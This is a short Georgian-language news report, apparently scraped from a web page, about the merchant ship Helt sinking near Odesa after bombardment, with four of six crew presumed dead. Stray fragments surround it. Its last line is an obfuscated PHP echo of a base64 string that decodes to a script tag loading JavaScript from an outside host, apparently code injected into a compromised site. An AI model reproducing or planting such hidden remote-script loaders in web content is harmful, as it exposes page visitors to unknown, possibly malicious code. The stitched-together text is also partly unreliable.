celsiusi
ავერსი საქკაბელი
საოკუპაციო ძალების მხრიდან დაბომბვის შედეგად ოდესასთან სავაჭრო გემი Helt-ი ჩაიძირა, რომელიც პანამის დროშის ქვეშ ცურავდა. ამის შესახებ ინფორმაციას თავდაცვის სამინისტროზე დაყრდნობით უკრაინული მედია ავრცელებს. აღსანიშნავია, რომ სავაჭრო გემი ოდესის ყურის შესასვლელთან იმყოფებოდა, დაბომბვის შედეგად დაიშალა და ფსკერზე ჩაიძირა.
 
გემის ეკიპაჟი 6 ადამიანისგან შედგებოდა. 2-მა მათგანმა სამაშველო ნავში გადასვლა შეძლო, ეკიპაჟის დანარჩენი წევრები კი, სავარაუდოდ, დაიღუპნენ. ამ ეტაპზე, შეუძლებელია სამაშველო ოპერაციის წარმოებაც, რადგან ოდესის პორტი რუსეთის სამხედრო გემების სამიზნეს წარმოადგენს.
 
Reuters-ი წერს, რომ სატვირთო გემი ესტონეთის საკუთრებაა. ეკიპაჟი კი უკრაინელი და რუსი მეზღვაურებისგან შედგებოდა.
661
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");